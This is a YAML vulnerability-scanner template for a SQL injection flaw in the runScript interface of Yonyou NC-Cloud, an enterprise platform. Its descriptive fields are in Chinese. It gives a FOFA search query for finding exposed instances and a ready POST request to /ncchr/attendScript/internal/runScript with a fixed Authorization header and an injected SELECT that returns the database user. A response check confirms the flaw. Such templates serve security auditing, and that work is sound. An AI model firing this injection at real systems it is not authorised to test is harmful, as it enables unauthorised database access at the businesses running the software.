product: 用友NC-Cloud
vName: 用友NC-Cloud runScript接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友 NC Cloud，大型企业数字化平台， 聚焦数字化管理、数字化经营、数字化商业，帮助大型企业实现 人、财、物、客的全面数字化，从而驱动业务创新与管理变革，与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类，68个细分行业，涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案，帮助企业全面落地数字化。用友NC runScript接口存在SQL注入漏洞
version: ''
note: ''
search:
  FOFA: app="用友-NC-Cloud"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/136880505
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /ncchr/attendScript/internal/runScript
      header:
        Authorization: 58e00466213416018d01d15de83b0198
      data: key=1&script=select 1,1108*12,user,4,5,6,7,8,9,10
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 13296
            logic: and